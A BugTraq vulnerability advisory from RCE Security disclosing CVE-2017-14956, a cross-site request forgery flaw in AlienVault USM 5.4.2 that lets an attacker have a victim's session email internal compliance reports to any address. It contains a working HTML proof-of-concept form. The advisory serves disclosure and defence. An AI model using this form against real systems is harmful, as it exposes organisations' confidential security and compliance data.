BugTraq
[RCESEC-2017-002][CVE-2017-14956] AlienVault USM v5.4.2 "/ossim/report/wizard_email.php" Cross-Site Request Forgery leading to Sensitive Information Disclosure Oct 13 2017 04:06PM
Julien Ahrens (info rcesecurity com)
RCE Security Advisory
https://www.rcesecurity.com

1. ADVISORY INFORMATION
=======================
Product: AlienVault USM
Vendor URL: https://www.alienvault.com
Type: Cross-Site Request Forgery [CWE-253]
Date found: 2017-09-22
Date published: 2017-10-13
CVSSv3 Score: 6.5 (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N)
CVE: CVE-2017-14956

2. CREDITS
==========
This vulnerability was discovered and researched by Julien Ahrens from
RCE Security.

3. VERSIONS AFFECTED
====================
AlienVault USM 5.4.2 (current)
older versions may be affected too.

4. INTRODUCTION
===============
AlienVault Unified Security Management (USM) is a comprehensive approach to
security monitoring, delivered in a unified platform. The USM platform includes
five essential security capabilities that provide resource-constrained
organizations with all the security essentials needed for effective threat
detection, incident response, and compliance, in a single pane of glass.

(from the vendor's homepage)

5. VULNERABILITY DETAILS
========================
AlienVault USM v5.4.2 offers authenticated users the functionality to generate
and afterwards export generated compliance reports via the script located at
"/ossim/report/wizard_email.php". Besides offering an export via a local file
download, the script does also offer the possibility to send out any report via
email to a given address (either in PDF or XLSX format).

An exemplary request to send the pre-defined report
"PCI_DSS_3_2__Vulnerability_Details" to the email address "email (at) example (dot) com [email concealed]"
looks like the following:

https://example.com/ossim/report/wizard_email.php?extra_data=1&name=UENJ
X0RTU18zXzJfX1Z1bG5lcmFiaWxpdHlfRGV0YWlscw==&format=email&pdf=true&email
=email (at) example (dot) com [email concealed]

The base64-encoded HTTP GET "name" parameter can be replaced with any other
of the approx. 240 pre-defined reports, that are shipped with AlienVault USM
since they do all have hardcoded identifiers, such as:
- Alarm_Report
- Ticket_Report
- Business_and_Compliance
- HIPAA_List_of_identified_ePHI_assets
- PCI_DSS_3_2_Database_Users_Added
- VulnerabilitiesReport
etc.

Since there is no anti-CSRF token protecting this functionality, it is
vulnerable to Cross-Site Request Forgery attacks. An exemplary exploit to send
the "PCI_DSS_3_2__Vulnerability_Details" report as a PDF-file to
"email (at) example (dot) com [email concealed]" could look like the following:

<html>
<body>
<form action="https://example.com/ossim/report/wizard_email.php">
<input type="hidden" name="extra_data" value="1" />
<input type="hidden" name="name" value="UENJX0RTU18zXzJfX1Z1bG5lcmFiaWxpdHlfRGV0YWlscw==" />
<input type="hidden" name="format" value="email" />
<input type="hidden" name="pdf" value="true" />
<input type="hidden" name="email" value="email (at) example (dot) com [email concealed]" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

6. RISK
=======
To successfully exploit this vulnerability a user with rights to access the
compliance reports must be tricked into visiting an arbitrary website while
having an authenticated session in the application.

The vulnerability allows remote attackers to trigger a report generation and
send the report out to an arbitrary email address, which may lead to the
disclosure of very sensitive internal reporting information stored in AlienVault
USM through pre-defined reports such as:
- Alarms
- Assets Inventory
- Compliance Reports such as PCI DSS and HIPAA
- Raw Logs
- Security Events
- Security Operations
- Tickets
- User Activity

7. SOLUTION
===========
None.

8. REPORT TIMELINE
==================
2017-09-22: Discovery of the vulnerability
2017-09-22: Sent full vulnerability details to publicly listed security email
address
2016-10-01: MITRE assigns CVE-2017-14956
2017-10-03: No response from vendor, notified vendor again
2017-10-13: No response from vendor
2017-10-13: Public disclosure according to disclosure policy

9. REFERENCES
=============
https://www.rcesecurity.com/2017/10/cve-2017-14956-alienvault-usm-leaks-
sensitive-compliance-information-via-csrf
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14956

-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEUHyElq6MolVtMDOLstOcv2HNivoFAlng5I8ACgkQstOcv2HN
ivoEJQ/+PZriSE3K295yXaGiFnd+1i+JRsXLJZ6hr1fL38rZje1rB6HGPGZz9Bu/
uIgA1KTyDA9lm1dCHU/S2cq3VggYw6T3J5g0okQ4abBxXUwHSJFI4NY27cWfPZy/
bdZIbTcB2fWjMoDIqG6gisBBGHCb2kL4D1XFUaLSXFBBxEaajuqZNI02c7/J1zBT
hPReT1bipIjGBeECnlSUIQYh30NmUwNehR7NnjSGYxGiiPD+rw+0QjgtbwiNrdfP
78OE+gq3qAtWo5UWQxGnI9Y16i2wAvAfNGsYPSwem2XJuhr82t+JCi5+RjFtAdUS
vfQYDhl3syWy57zN6Dn5Q+jtng16ci+MfX5c7wM70NJEfBEHt9nqAxkaEtytsvdM
pG4b/lWmIOwcv546kGaTQg1Nhn9HQcA+l2KP4hxcXPwJ7984r8LfCyMoEUSEZXQq
JoM18gFYuE1Rs8Oklxesk2GfA+Au3463M4jXKDSui/0wFTzHzZWD3q02kG5ZJcKE
BzfyojoNjFkX7leKdzGUhX3qwmNei3YfslX6xQ+3U+hgBAx/CYe4Vs2ZsU8uREiq
PZ8Q1RWHP3h7TZh6cvV7aeL0TmPviQIpvfuduMUJbziAA7hZNW/IrWcTzJXIA6Y/
FDsisszj9CgK2EGLUsCTvUu5njc87uuIUVxnJHEWoZHoX1bTppg=
=6Cmj
-----END PGP SIGNATURE-----

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus